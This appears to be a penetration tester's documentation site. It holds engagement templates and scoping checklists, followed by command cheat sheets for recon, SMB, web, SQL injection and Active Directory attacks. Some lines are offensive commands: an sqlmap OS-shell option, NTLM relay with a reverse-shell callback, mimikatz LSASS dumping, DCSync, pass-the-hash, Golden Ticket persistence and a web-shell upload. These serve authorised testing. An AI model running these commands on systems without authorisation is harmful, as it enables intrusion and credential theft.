Docs - Pentesting

1 - Meta

Meta: Penetration Testing Execution Standard (PTES)

• http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines

• PowerShell: https://underthewire.tech/wargames

• Linux Terminal: https://overthewire.org/wargames/

• Tmux:

  • https://tmuxcheatsheet.com/
  • https://www.youtube.com/watch?v=Lqehvpe_djs

• Vim:

  • https://vimsheet.com/

📦 Recommended Retired Boxes

2 - Pre-Engagement

Checklist

This page is the master checklist where sections can be embedded into the relevant doc pages (e.g. Active Directory) via embed-section (custom Hugo shortcode for this website).

Host Discovery & ARP

• 1. Passive Listen (Responder / tcpdump) (Run Responder in passive mode or tcpdump to observe broadcast traffic, discover hosts, and passively collect credentials before any active scanning)
• 2. Interface & Subnet Mapping (Identify your own IP and CIDR via ip a or ipconfig to define the scope)
• 3. Passive Neighbor Discovery (Check the local ARP cache via arp -a or ip neigh to see connected peers)
• 4. Active Host Discovery (Run nmap -sn <CIDR> or netdiscover to sweep the subnet via ARP/ICMP)
• 5. Role Identification (Scan live hosts for specific ports like 88/445/389 to distinguish DCs from workstations)

DNS

• 1. Server Recon & Zone Transfer (Identify Nameservers, Bind version, and attempt dig axfr or dig any for a full dump)
• 2. Record Enumeration (Query standard types A, MX, TXT, SRV, and run Reverse DNS/PTR against IP ranges)
• 3. Subdomain Discovery (Combine passive cert transparency logs via crt.sh with active bruteforcing via gobuster/puredns)
• 4. Vulnerability Analysis (Check for dangling CNAMEs for Domain Takeover, and monitor LLMNR/NBT-NS if internal)

SMB

• 1. Anonymous Access & Share Listing (Attempt a null session via smbclient -L <IP> -N or crackmapexec smb <IP> --shares to list shares without credentials)
• 2. Comprehensive Enumeration (Run enum4linux-ng -A <IP> to automatically dump users, groups, OS info, and password policies)
• 3. Share Content Inspection (Mount accessible shares or use smbclient to browse directories for sensitive files, scripts, or backups)
• 4. Security Posture Check (Use nmap --script=smb-security-mode to verify if SMB signing is required, which is critical for preventing relay attacks)

Web

• 1. Technology & Security Fingerprinting (Use whatweb and nikto to identify the server, frameworks, and WAF, and curl to inspect headers and robots.txt)
• 2. Content & vHost Discovery (Run feroxbuster or gobuster dir to bruteforce directories/files, and gobuster vhost to find hidden virtual hosts)
• 3. Automated Vulnerability Scanning (Use nikto or wapiti to scan for common misconfigurations and known vulnerabilities like outdated software)
• 4. Manual Application Testing (OWASP Top 10) (After automated scans, manually inspect the application for logical flaws, focusing on Injection, Broken Access Control, and XSS)

SQL

If these steps fail, the target is likely not vulnerable via automation.

Phase 1: Injection & Tuning

• Manual Triage (Burp): Confirm “True” vs “False” response size manually. Never run SQLMap blind.
• The Setup: Save request to req.txt. Mark injection point with *. (sqlmap -r req.txt --batch)
• The Unlocker (Tuning): Logic (OR) or Brackets ()))) failing? (--level 5 --risk 3)
• The Syntax Fix: SQLMap guessing wrong boundaries? (--prefix="')" - Match your Burp findings).
• The Speedup: Time-based checks taking forever? (--technique=BEU - Force Boolean/Error/Union only).

Phase 2: Stability & Evasion

• The Hallucination Fix: “2 letters off” or garbage data? (--string="SuccessMsg" or --text-only).
• The Bypass: WAF blocking or 403s? (--random-agent --tamper=space2comment --skip-waf).

Phase 3: Loot & Shells

• The Recon: Check privileges immediately. (--is-dba --current-db).
• The Dump: Surgical extraction (Don’t dump the world). (-D <DB> -T <TABLE> -C <USER,PASS> --dump).
• The Endgame (RCE): DBA is True? (--os-shell (Add --technique=E if empty) OR --file-write="shell.php").

Troubleshooting (Panic Modifiers) Add these to The Dump if injection exists but data fails to extract.

• --union-cols=X: Manually set column count (if SQLMap counts wrong).
• --no-cast: Disable payload casting (Fixes specific DB errors).
• --hex: Encode data extraction (Bypasses WAF filters on output).

Active Directory

• 1. Domain & Network Identification (Identify DC IP, Domain Name, Ports 53/88/389/445, net config workstation)
• 2. User Enumeration (Build target list via Kerbrute, RID Cycling, or net user /domain)
• 3. Initial Credential Acquisition (Run Responder for LLMNR/NBT-NS poisoning, check AS-REP Roasting)
• 4. BloodHound Collection & Analysis (Run SharpHound, upload data, analyze “Shortest Paths” and “High Value Targets”)
• 5. Service & Misconfiguration Hunting (Kerberoasting TGS, check SYSVOL/GPP for passwords, DNS/Printer Bug checks)
• 6. ACL & Object Rights Analysis (Check for “Dangerous Rights” like GenericAll/WriteDACL via PowerView or BloodHound)
• 7. Certificate Services (ADCS) Check (Enumerate vulnerable templates, Shadow Credentials/PyWhisker, Pass-the-Certificate)
• 8. Access & Admin Validation (Check Local Admin rights, test RDP/WinRM access, verify “Double Hop” status)
• 9. Lateral Movement (Execute Pass-the-Hash, Pass-the-Ticket, or Overpass-the-Hash to pivot)
• 10. Domain Dominance (Perform DCSync to dump NTDS.dit, create Golden Tickets, enumerate Trusts)

Penetration Test: Pre-Engagement Template

• Style Guide: https://bishopfox.com/cybersecurity-style-guide

1. Project Metadata

• Client Name: [Client Name]
• Project Name: [Project Name / Engagement Title]
• Date Created: [YYYY-MM-DD]
• Start Date: [YYYY-MM-DD]
• End Date: [YYYY-MM-DD]

Key Personnel

• Primary Client Contact: [Name, Title, Email, Phone]
• Secondary Client Contact: [Name, Title, Email, Phone]
• Technical Support Contact: [Name, Title, Email, Phone]
• Signatory Authority: [Name, Title]
• Lead Penetration Tester: [Your Name]

2. Master Document Checklist

• 1. Non-Disclosure Agreement (NDA)

  • Status: [Pending | Signed]
  • Notes:

• 2. Scoping Questionnaire

  • Status: [Sent | Received | Reviewed]
  • Notes:

• 3. Scoping Document

  • Status: [Drafting | Finalized]
  • Notes:

• 4. Penetration Testing Proposal (Contract/SoW)

  • Status: [Drafting | Sent | Signed]
  • Notes:

• 5. Rules of Engagement (RoE)

  • Status: [Drafting | Finalized | Signed]
  • Notes:

• 6. Contractors Agreement (Physical Assessments)

  • Status: [N/A | Required | Signed]
  • Notes:

• 7. Reports

  • Status: [In Progress | Delivered]
  • Notes:

3. Scoping Questionnaire

Assessment Type(s) Required

• Internal Vulnerability Assessment
• External Vulnerability Assessment
• Internal Penetration Test
• External Penetration Test
• Wireless Security Assessment
• Application Security Assessment
• Physical Security Assessment
• Social Engineering Assessment
• Red Team Assessment
• Web Application Security Assessment

Notes on specific requirements (e.g., black box, evasiveness, vishing):

Critical Scoping Information

• How many expected live hosts?

  Answer:

• How many IPs/CIDR ranges in scope?

  Answer:

• How many Domains/Subdomains are in scope?

  Answer:

• How many wireless SSIDs in scope?

  Answer:

• How many web/mobile applications? Authenticated roles?

  Answer:

• For phishing: how many users targeted? List provided?

  Answer:

• For physical assessment: how many locations? Geographically dispersed?

  Answer:

• Objective of the Red Team Assessment? Out of scope activities?

  Answer:

• Is a separate Active Directory Security Assessment desired?

  Answer:

• Will network testing be anonymous or as a standard domain user?

  Answer:

• Do we need to bypass Network Access Control (NAC)?

  Answer:

Information Disclosure & Evasiveness

• Information Disclosure Level:

  • Black Box (no information provided)
  • Grey Box (IPs/URLs provided)
  • White Box (detailed information provided)

• Evasiveness Level:

  • Non-Evasive
  • Hybrid-Evasive (start quiet, get louder)
  • Fully Evasive

4. Contract / Scope of Work (SoW) Checklist

• NDA:

  • A secrecy contract between the client and contractor.
  • Notes:

• Goals:

  • High-level and fine-grained milestones to be achieved.
  • Notes:

• Scope:

  • Individual components to be tested (domains, IPs, specific accounts).
  • Notes:

• Penetration Testing Type:

  • The chosen type of test (e.g., Internal, External, Web App).
  • Notes:

• Methodologies:

  • Examples: OSSTMM, OWASP, PTES.
  • Notes:

• Penetration Testing Locations:

  • External (Remote via VPN) and/or Internal.
  • Notes:

• Time Estimation:

  • Start and end dates for the entire engagement and for specific phases (Exploitation, Post-Ex). Testing hours (during/after business hours).
  • Notes:

• Third Parties:

  • Any cloud providers, ISPs, or hosting providers involved. Written consent must be obtained from them by the client.
  • Notes:

• Evasive Testing:

  • Clarify if techniques to evade security systems are in scope.
  • Notes:

• Risks:

  • Inform the client of potential risks (e.g., system instability, locked accounts).
  • Notes:

• Scope Limitations & Restrictions:

  • Which servers, workstations, or network components are critical and must be avoided.
  • Notes:

• Information Handling:

  • Compliance requirements (e.g., HIPAA, PCI, NIST).
  • Notes:

• Contact Information:

  • A full list of contacts and an escalation priority order.
  • Notes:

• Lines of Communication:

  • E-mail, phone calls, personal meetings.
  • Notes:

• Reporting:

  • Structure of the report, customer-specific requirements, and presentation plans.
  • Notes:

• Payment Terms:

  • Prices and terms of payment.
  • Notes:

5. Rules of Engagement (RoE) Checklist

• Introduction: Description of the RoE document.
• Contractor: Company name, key contacts.
• Penetration Testers: Names of testers.
• Contact Information: Full contact details for all parties.
• Purpose: Purpose of the penetration test.
• Goals: Goals to be achieved.
• Scope: All IPs, domains, URLs, CIDR ranges.
• Lines of Communication: E-mail, phone, etc.
• Time Estimation: Start and end dates.
• Time of the Day to Test: Specific testing hours.
• Penetration Testing Type: The specific type of test.
• Penetration Testing Locations: How the connection to the client network is established.
• Methodologies: OSSTMM, PTES, OWASP, etc.
• Objectives / Flags: Specific users, files, or information to target.
• Evidence Handling: Encryption and secure protocols for handling evidence.
• System Backups: Acknowledgment of client’s backup procedures.
• Information Handling: Strong data encryption requirements.
• Incident Handling and Reporting: Process for emergency contact and test interruptions.
• Status Meetings: Frequency, dates, times, and attendees.
• Reporting: Type, target readers, and focus of the final report.
• Retesting: Start and end dates for retesting patched vulnerabilities.
• Disclaimers and Limitation of Liability: System damage, data loss.
• Permission to Test: Confirmation of signed contract.

6. Kick-Off Meeting Agenda

• Attendees:
  • [List of Client POCs]
  • [List of Client Technical Staff]
  • [List of Pentesting Team Members]
• Agenda Items:
  • Review nature and scope of the penetration test.
  • Confirm Rules of Engagement (RoE).
  • Define “Critical Vulnerability” and the process for immediate notification (e.g., for unauthenticated RCE).
  • Discuss potential risks (log entries, alarms, accidental account lockouts).
  • Explain the full penetration testing process in a clear, non-technical way.
  • Confirm client’s goals and priorities.
  • Open floor for Q&A.

7. Physical Assessment Addendum

• Introduction
• Contractor
• Purpose
• Goal
• Penetration Testers
• Contact Information
• Physical Addresses
• Building Name
• Floors
• Physical Room Identifications
• Physical Components
• Timeline
• Notarization
• Permission to Test (“Get Out of Jail Free Card”)

Pre-Engagement

Evidence Collection

• Centralize Project Data: Maintain one place for scope (IPs/URLs), client contacts, Rules of Engagement (RoE), and a running to-do list.
• Document the Attack Path: As you move through the network, document the full chain of exploits with raw command output and screenshots.
• Maintain a Credential Log: Keep a separate, centralized list of all compromised credentials, keys, and secrets.
• Isolate Findings: Create a dedicated folder/note for each distinct vulnerability. Write the narrative and save evidence as you discover it, not after.
• Track Payloads & Modifications: Keep a log of all uploaded payloads (with file hashes and paths) and any system modifications made (accounts created, settings changed, timestamps, host IPs).
• Get Approval for Destructive Actions: Always get written client approval before making system changes or running tests that could impact stability.
  • For any big changes always save:
    • IP address of the host(s)/hostname(s) where the change was made
    • Timestamp of the change
    • Description of the change
    • Location on the host(s) where the change was made
    • Name of the application or service that was tampered with
    • Name of the account (if you created one) and perhaps the password in case you are required to surrender it
• Prioritize Terminal Output: Use raw text from your terminal over screenshots. It’s easier to redact, format, and allows clients to copy-paste commands. Use <SNIP> for brevity but never alter the output.
• Redact Securely:
  • Use solid black boxes to redact PII and credentials, not blur or pixelation (which can be reversed).
  • Burn redactions directly into the image file itself, not as a shape overlay in a Word document.
• Handle Sensitive Data Safely: Do not exfiltrate raw PII. Screenshot directory listings instead of downloading sensitive files to prove access.

Collection Structure

Also see [[tmux]] and use tmux logging to automatically collect the terminal output.

mkdir -p {Admin,Deliverables,Evidence/{Findings,Scans/{Vuln,'Service Enum','Web Enum','AD Enum'},Notes,OSINT,'Log Output','Misc Files'},Retest}

• Admin
  • Scope of Work (SoW) that you’re working off of, your notes from the project kickoff meeting, status reports, vulnerability notifications, etc
• Deliverables
  • Folder for keeping your deliverables as you work through them. This will often be your report but can include other items such as supplemental spreadsheets and slide decks, depending on the specific client requirements.
• Evidence
  • Findings
    • We suggest creating a folder for each finding you plan to include in the report to keep your evidence for each finding in a container to make piecing the walkthrough together easier when you write the report.
  • Scans
    • Vulnerability scans
      • Export files from your vulnerability scanner (if applicable for the assessment type) for archiving.
    • Service Enumeration
      • Export files from tools you use to enumerate services in the target environment like Nmap, Masscan, Rumble, etc.
    • Web
      • Export files for tools such as ZAP or Burp state files, EyeWitness, Aquatone, etc.
    • AD Enumeration
      • JSON files from BloodHound, CSV files generated from PowerView or ADRecon, Ping Castle data, Snaffler log files, CrackMapExec logs, data from Impacket tools, etc.
  • Notes
    • A folder to keep your notes in.
  • OSINT
    • Any OSINT output from tools like Intelx and Maltego that doesn’t fit well in your notes document.
  • Wireless
    • Optional if wireless testing is in scope, you can use this folder for output from wireless testing tools.
  • Logging output
    • Logging output from Tmux, Metasploit, and any other log output that does not fit the Scan subdirectories listed above.
  • Misc Files
    • Web shells, payloads, custom scripts, and any other files generated during the assessment that are relevant to the project.
• Retest
  • This is an optional folder if you need to return after the original assessment and retest the previously discovered findings. You may want to replicate the folder structure you used during the initial assessment in this directory to keep your retest evidence separate from your original evidence.

Client Communication

Send start notification email including information such as:

• Tester name
• Description of the type/scope of the engagement
• Source IP address for testing (public IP for an external attack host or the internal IP of our attack host if we are performing an Internal Penetration Test)
• Dates anticipate for testing
• Primary and secondary contact information (email and phone)

At the end of each day, we should send a stop notification to signal the end of testing

Email Template

Subject: External Penetration Test - Start of Testing
From:
To:
Cc:
Date: Mon 6/20/2022 8:29AM

Good Morning,

This email is to notify you that the External Penetration Test against <COMPANY>'s internet-facing network assets has begun. All testing traffic will originate from the following IP address:
<TARGETS>

While we do not anticipate service disruptions during testing, if any issues arise, please do not hesitate to reach out via the cell phone number or email address in my signature line.

If I am unavailable for any reason, the secondary contact for this engagement will be:

<NAME>
<TITLE>
<PHONE>
<EMAIL>

As discussed during the kickoff call, I will send out a vulnerability notification for any high-risk vulnerabilities uncovered against internet-facing hosts. The assessment will begin with manual and automated information gathering and enumeration scans, then proceed to manual testing and validation of scan results.


Thank you, and I look forward to a productive assessment.

Regards,
<NAME>
<TITLE> | <COMPANY>
<PHONE>
<WEBSITE>
<EMAIL>

Baseline Tracking of Technological Assets

Diagrams.net: https://app.diagrams.net/

• DNS records, network device backups, and DHCP configurations
• Full and current application inventory
• A list of all enterprise hosts and their location
• Users who have elevated permissions
• A list of any dual-homed hosts (2+ network interfaces)
• Keeping a visual network diagram of your environment

People, Processes, and Technology

Processes

• Proper policies and procedures for asset monitoring and management
  • Host audits, the use of asset tags, and periodic asset inventories can help ensure hosts are not lost
• Access control policies (user account provisioning/de-provisioning), multi-factor authentication mechanisms
• Processes for provisioning and decommissioning hosts (i.e., baseline security hardening guideline, gold images)
• Change management processes to formally document who did what and when they did it

Perimeter First

• What exactly are we protecting?
• What are the most valuable assets the organization owns that need securing?
• What can be considered the perimeter of our network?
• What devices & services can be accessed from the Internet? (Public-facing)
• How can we detect & prevent when an attacker is attempting an attack?
• How can we make sure the right person &/or team receives alerts as soon as something isn’t right?
• Who on our team is responsible for monitoring alerts and any actions our technical controls flag as potentially malicious?
• Do we have any external trusts with outside partners?
• What types of authentication mechanisms are we using?
• Do we require Out-of-Band (OOB) management for our infrastructure. If so, who has access permissions?
• Do we have a Disaster Recovery plan?

Internal Considerations

• Are any hosts that require exposure to the internet properly hardened and placed in a DMZ network?
• Are we using Intrusion Detection and Prevention systems within our environment?
• How are our networks configured? Are different teams confined to their own network segments?
• Do we have separate networks for production and management networks?
• How are we tracking approved employees who have remote access to admin/management networks?
• How are we correlating the data we are receiving from our infrastructure defenses and end-points?
• Are we utilizing host-based IDS, IPS, and event logs?

3rd Parties Infrastructure

• AWS: https://aws.amazon.com/es/security/penetration-testing/
• Oracle: https://www.oracle.com/corporate/security-practices/testing/

Sensitive Data Regulations

• UK: https://www.gov.uk/data-protection
• US:
  • Baselines/Govt: https://public.cyber.mil/stigs/
  • General: https://www.cisecurity.org/cis-benchmarks
  • Info Security: https://www.iso.org/standard/27001
  • Privacy: https://www.ftc.gov/business-guidance/privacy-security
  • Financial: https://www.ftc.gov/business-guidance/privacy-security/gramm-leach-bliley-act
  • Health: https://www.hhs.gov/hipaa/for-professionals/security/index.html

Sample Engagement

• Ref: https://archive.ph/i6AeU

Phase 1: Initial Reconnaissance & Network Mapping

• Host Discovery: Perform a quick Nmap scan to identify live hosts and common services.
  • nmap -T4 -p 21,22,23,53,80,139,443,445,3389 --open -iL <scope.txt> -oG nmap_quick
• Web Service Screenshotting: Use gowitness or EyeWitness on discovered web ports (80, 443, 8080, etc.) to visually identify interesting applications.
  • gowitness nmap -f nmap_quick
• Full Port Scan: Run a comprehensive Nmap scan in the background on all live hosts to discover non-standard services.
  • nmap -T4 -p- -sV -sC -iL <live_hosts.txt> -oA nmap_full
• Vulnerability Scanning: Run a Nessus (or equivalent) authenticated scan.
  • Note: This is primarily for the client’s benefit to identify patching gaps. Exploits from this are secondary to credential-based attacks.
• Identify Relay Targets: Use netexec to find hosts with SMB signing disabled, creating a target list for relay attacks.
  • nxc smb <CIDR> --gen-relay-list smb_relay_targets.txt

Phase 2: Initial Access & Foothold

• LLMNR/NBT-NS Poisoning: Start Responder to poison local name resolution and capture NTLMv2 hashes from hosts on the same broadcast domain.
  • responder -I <interface> -dwPv
• NTLM Relay Attack: In parallel with Responder, run Impacket’s ntlmrelayx.py to relay captured hashes to the list of SMB-signing-disabled hosts. The goal is to execute a command or dump local hashes.
  • ntlmrelayx.py -tf smb_relay_targets.txt -smbsupport -c "whoami"
• AD CS Enumeration (Critical): Use Certipy to find vulnerable certificate templates in Active Directory Certificate Services. This is a primary vector for privilege escalation.
  • certipy find -u '<user>' -p '<password>' -dc-ip <DC_IP> -vulnerable
• Anonymous Enumeration: Check for anonymous access to SMB shares and LDAP.
  • nxc smb <CIDR> -u '' -p '' --shares
• Offline Password Cracking: Use Hashcat on any captured NTLMv2 hashes. A successful crack provides the first set of valid user credentials.
  • hashcat -m 5600 hashes.txt /path/to/wordlist.txt

Phase 3: Post-Compromise Situational Awareness

At this point, we assume a valid user credential (username/password or hash) has been acquired.

• BloodHound Data Collection: Run the SharpHound ingestor to collect AD data. This is the most critical step to visualize attack paths.
  • SharpHound.exe -c All
• Kerberoasting: Use Rubeus or Impacket’s GetUserSPNs.py to request service tickets (TGS) for accounts with Service Principal Names (SPNs). Attempt to crack these offline with Hashcat.
  • Rubeus.exe kerberoast /outfile:kerberoast_hashes.txt
• Enumerate User Privileges: Use netexec with the obtained credential to determine where the user has local administrator rights.
  • nxc smb <CIDR> -u '<user>' -p '<password>' --local-auth
• Host-Based Enumeration: On any system where you have access (even as a low-privilege user), run situational awareness tools like Seatbelt to find sensitive data, saved browser credentials, or misconfigurations.
  • Seatbelt.exe -group=all

Phase 4: Privilege Escalation & Lateral Movement

• Pivoting with Admin Rights: If the user has local admin rights on a machine, pivot to it.
• Credential Dumping: Dump credentials from the compromised machine’s memory (LSASS) and SAM database.
  • nxc smb <target_IP> -u '<user>' -p '<password>' --local-auth -M lsassy
  • nxc smb <target_IP> -u '<user>' -p '<password>' --local-auth --sam
• Pass-the-Hash: Use the dumped local administrator hash to move laterally to other workstations, leveraging the common practice of local admin password reuse.
  • nxc smb <CIDR> -u Administrator -H <ntlm_hash> --local-auth
• Analyze BloodHound Data: Ingest the collected data into the BloodHound UI. Look for:
  • Shortest paths to Domain Admins.
  • Users with dangerous rights (GenericAll, WriteDACL) over other objects.
  • Domain Admins logged into workstations where you now have local admin access.

Phase 5: Domain Dominance

• Targeting Domain Admin Sessions: Using BloodHound, identify a workstation where a Domain Admin is logged in and you have local admin rights.
• DA Credential Extraction: Pivot to that machine and dump credentials from LSASS. Capturing a DA’s ticket or hash from memory is often the final step.
  • mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
• Process Injection (If Needed): If credentials are not in LSASS but the DA is logged on, gain an interactive shell and inject into a process owned by the DA to inherit their permissions.
• DCSync: Once DA-equivalent privileges are obtained, use Impacket’s secretsdump.py or mimikatz to perform a DCSync attack, dumping all NTLM hashes from the Domain Controller.
  • secretsdump.py <domain>/<DA_user>:<password>@<DC_IP> -just-dc-ntlm
• Persistence: Create a Golden Ticket using the krbtgt hash obtained from the DCSync to maintain persistent access to the entire domain.

3 - Info Gathering

Passive Information Gathering

Enumeration

Primary source of information will be:

• scoping document (in-scope assets)
• passive OSINT

External Recon (OSINT)

• Public DNS and domain ownership records
• Email Addresses
  • You can then use these to check if any have been involved in a breach or use Google Dorks to search for them on sites like Pastebin
• Subdomains
• Third-party vendors
• Similar domains
• Public cloud resources

And where to find that above information…

via DNS

Great to validate and discover new information, especially from IP and ASN searches.

• https://whois.domaintools.com/
  • Check ASN
• https://viewdns.info/
  • DNS (Local Namerservers): https://viewdns.info/dnsreport
  • All Records: https://viewdns.info/dnsrecord

via Search Engine Dorking

• See more about… Search Engine Dorking

  Source: Docs > 3 - Info Gathering > search-engine-dorking

  • https://www.exploit-db.com/google-hacking-database
  • Cached Website: https://web.archive.org/

  site:
  inurl:
  filetype:
  intitle:
  intext:
  inbody:
  cache:
  link:
  related:
  info:
  define:
  numrange:
  allintext:
  allinurl:
  allintitle:
  
  # Operators
  AND
  OR
  NOT
  *
  ..
  " "
  -
  +
  
  ### EXAMPLES
  # Find Emails
  inurl:<DOMAIN> intext:"@<DOMAIN>"
  
  # Finding Login Pages:
  site:<DOMAIN> inurl:login
  site:<DOMAIN> (inurl:login OR inurl:admin)
  
  # Identifying Exposed Files:
  site:<DOMAIN> filetype:pdf
  site:<DOMAIN> (filetype:xls OR filetype:docx)
  inurl:<DOMAIN> filetype:pdf  # !!! careful this one can show malicious site hosting cached files !!!
  
  # Uncovering Configuration Files:
  site:<DOMAIN> inurl:config.php
  
  # (searches for extensions commonly used for configuration files)
  site:<DOMAIN> (ext:conf OR ext:cnf)
  
  # Locating Database Backups:
  site:<DOMAIN> inurl:backup
  site:<DOMAIN> filetype:sql

• See more about… User Enumeration

  Source: Docs > 7 - Lateral Movement > active-directory#user-enumeration

  User Enumeration

  “A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication”

  • https://github.com/ropnop/kerbrute
  • Username Lists
    • https://github.com/initstring/linkedin2username
    • https://github.com/insidetrust/statistically-likely-usernames
  • PowerShell Tool: https://github.com/dafthack/DomainPasswordSpray

  See more about… User Enum

  Source: Docs > 5 - Exploitation > online-credentials-attacks#user-enum

  User Enum

  1. No creds: Try anonymous sessions
  2. Later: with credentials

  See more about… Protocol Poisoners

  Source: Docs > 5 - Exploitation > protocol-poisoners

  These are a great way to passively enumerate or sniff for creds for traffic inside of the network.

via Social Media

Check various sites, especially for different types of IT admins, to skim information about hardware, software, or services used:

• LinkedIn.com
• Indeed.com
• Glassdoor.com

via other Services

• Leaked Creds: https://dehashed.com/
  • https://github.com/sm00v/Dehashed
  • curl 'https://api.dehashed.com/search?query=domain:target.com&size=1000' -u <EMAIL>:<API_KEY> -H 'Accept: application/json' > dehashed_results.json
• Leaked Creds: https://github.com/trufflesecurity/truffleHog
• Public (Data) Buckets: https://buckets.grayhatwarfare.com/

Internal Recon

Passively, sampling the traffic can be a great way to understand the network insofar as hosts, services, and maybe even sometimes credentials

sudo responder -I <INTERFACE> -A

# Force WPAD; may cause a login prompt
sudo responder --wpad --ForceWpadAuth --verbose --interface=<INTERFACE>

# Relay NTLM to target and execute a callback (e.g. rev shell)
# nc -lvnp <PORT>
impacket-ntlmrelayx --no-http-server -smb2support -t <TARGET> -c '<POWERSHELL_CALLBACK>'

# Download latest release (Windows x64, single-file trimmed build)
TAG=$(curl -s https://api.github.com/repos/Kevin-Robertson/Inveigh/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
wget "https://github.com/Kevin-Robertson/Inveigh/releases/download/$TAG/Inveigh-net10.0-win-x64-trimmed-single-$TAG.zip"
unzip "Inveigh-net10.0-win-x64-trimmed-single-$TAG.zip"

# Or build from repo (C#): open Inveigh.sln, build/publish for win-x64, or:
# dotnet publish -r win-x64 -c Release -p:PublishSingleFile=true

# Run with LLMNR + NBNS spoofing, full console output, and file output (all explicit)
.\Inveigh.exe -LLMNR Y -NBNS Y -Console 5 -FileOutput Y

# Sample the network traffic
sudo tcpdump -i <INTERFACE> -w <OUTPUT_FILE>

Search Engine Dorking

• https://www.exploit-db.com/google-hacking-database
• Cached Website: https://web.archive.org/

site:
inurl:
filetype:
intitle:
intext:
inbody:
cache:
link:
related:
info:
define:
numrange:
allintext:
allinurl:
allintitle:

# Operators
AND
OR
NOT
*
..
" "
-
+

### EXAMPLES
# Find Emails
inurl:<DOMAIN> intext:"@<DOMAIN>"

# Finding Login Pages:
site:<DOMAIN> inurl:login
site:<DOMAIN> (inurl:login OR inurl:admin)

# Identifying Exposed Files:
site:<DOMAIN> filetype:pdf
site:<DOMAIN> (filetype:xls OR filetype:docx)
inurl:<DOMAIN> filetype:pdf  # !!! careful this one can show malicious site hosting cached files !!!

# Uncovering Configuration Files:
site:<DOMAIN> inurl:config.php

# (searches for extensions commonly used for configuration files)
site:<DOMAIN> (ext:conf OR ext:cnf)

# Locating Database Backups:
site:<DOMAIN> inurl:backup
site:<DOMAIN> filetype:sql

4 - Vuln Analysis

0) Scanning

• Ports:
  • https://www.stationx.net/common-ports-cheat-sheet/
  • https://web.archive.org/web/20240315102711/https://packetlife.net/media/library/23/common-ports.pdf
  • https://nullsec.us/top-1-000-tcp-and-udp-ports-nmap-default/
• OS Identification via:
  • TTL: https://subinsb.com/default-device-ttl-values/

Host Discovery & ARP

# -p: source port
# TCP
nc -nvzw5 <TARGET> <PORT>
# UDP
nc -unvzw5 <TARGET> <PORT>

# Connect to Encrypted Service (TLS/SSL)
openssl s_client -starttls ftp -connect <TARGET>:<PORT>

# Banner Grabbing
sudo nmap -n -Pn --script banner.nse <TARGET>

Ping Sweeps

NOTE: sometimes ARP caches are delayed or not built… so running a ping sweep 2x is helpful

# NIX
for i in {1..254} ; do (ping -c1 <TARGET_SUBNET>.$i | grep "bytes from" &) ; done

#  WIN: DOS
# !!! LEAVE OFF LAST OCTET !!!
for /L %i in (1 1 254) do ping <TARGET_SUBNET>.%i -n 1 -w 100 | find "Reply"
# Win: PowerShell
# !!! LEAVE OFF LAST OCTET !!!
1..254 | % { $ip="<TARGET_SUBNET>.$_"; if ((New-Object System.Net.NetworkInformation.Ping).Send($ip, 100).Status -eq "Success") { "$($ip): True" } }

# Metasploit
run post/multi/gather/ping_sweep RHOSTS=<TARGET_SUBNET>

# Host Discovery
sudo nmap --open -oA host_discovery_simple.txt -iL scope.txt 

# NOTE: this is optimized for labs:
# -T4 --max-rtt-timeout 150ms --min-parallelism 100 --min-rate 1000 --max-retries 1
sudo nmap -n -sn -v --stats-every 30s -PS445,80,443,3389,135,5985,22,8080,111 -oA host_discovery.txt -iL scope.txt -T4 --max-rtt-timeout 150ms --min-parallelism 100 --min-rate 1000 --max-retries 1

---

awk '/Up$/{print $2}' host_discovery.txt > live_hosts.txt

# All ports (TCP Full Scan)
rustscan -a live_hosts.txt --ulimit 5000 -- -sC -sV -v --stats-every 30s -oA nmap_rustscan_all_ports

# Massive network (SYN Half Scan)
sudo masscan --rate 1000 -p1-65535 -iL live_hosts.txt -oL masscan.txt -e <INTERFACE> 
PORTS=$(awk '/open/ {print $3}' masscan.txt | sort -u | paste -sd, -)
sudo nmap --stats-every 30s -sS -sV -sC -v -p$PORTS -oA nmap_masscan_all_ports <TARGET>

# UDP
sudo nmap -sU -sV --top-ports 100 -v -oA nmap_top100_udp <TARGET>

# Find Live Hosts
sudo nmap -n -sn --reason -oA host_disc <TARGET>
# Create list
grep 'Status: Up' host_disc.gnmap | awk '{print $2}' | tee live_hosts.txt
# Scan normally w/ list
sudo nmap -n -Pn -sS -sV -sC --reason --top-ports=1000 -oA host_disc_live -iL live_hosts.txt
# Trace packet (MORE INFO)
sudo nmap -n -Pn -sS --packet-trace --disable-arp-ping -p <PORT> <TARGET>

# TCP Full-Connect (3-way handshake)
sudo nmap -n -Pn -sT -sV -sC --reason <TARGET>

# UDP (normally no response)
sudo nmap -n -Pn -sU -sV -sC --reason --top-ports=100 <TARGET>

# Create HTML reports from nmap XML scan
# https://nmap.org/book/output.html
xsltproc <SCAN_FILE>.xml -o <OUTPUT>.html

# SPAM: scan using multiple IP addresses
sudo nmap -n -Pn --max-retries=1 --source-port <SRC_PORT> -D RND:5 <TARGET>

# --max-retries <ATTEMPTS>
# -T <AGGRESSION_1_5>
# --packet-trace
# --reason
# --disable-arp-ping
# --top-ports=<NUM>
# --script <SCRIPT>
# -g <SRC_PORT>
# --dns-server <NAMESERVER>

wget https://github.com/andrew-d/static-binaries/raw/refs/heads/master/binaries/linux/x86_64/nmap

scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null nmap <USER>@<TARGET>:/tmp/

chmod +x nmap
./nmap -n -Pn -sT --stats-every 15s -vvv <TARGET_SUBNET>

# --script-trace : trace script scans
nmap -p 80 --script http-put --script-args http-put.url='/dav/shell.php',http-put.file='./shell.php' -oA nmap_http_put <TARGET>

sudo wget --output-file /usr/share/nmap/scripts/<SCRIPT>.nse \
    https://svn.nmap.org/nmap/scripts/<SCRIPT>.nse

nmap --script-updatedb

Common Web Applications

The following sections will detail how to enumerate various web appliations, which could lead to exploitation and access.

EyeWitness

For quick web application discovery.

# https://github.com/RedSiege/EyeWitness
git clone https://github.com/RedSiege/EyeWitness.git && cd EyeWitness/setup

# cmake is already a part of build-essential
sed -i 's/cmake//gI' ./setup.sh
sudo ./setup.sh
cd ..
source eyewitness-venv/bin/activate

# SCAN using nmap XML results output
mkdir ../scan_eyewitness
python Python/EyeWitness.py --web -x ../scan_nmap_disc_all_ports.xml -d ../scan_eyewitness

Wordpress

• WPScan: https://github.com/wpscanteam/wpscan
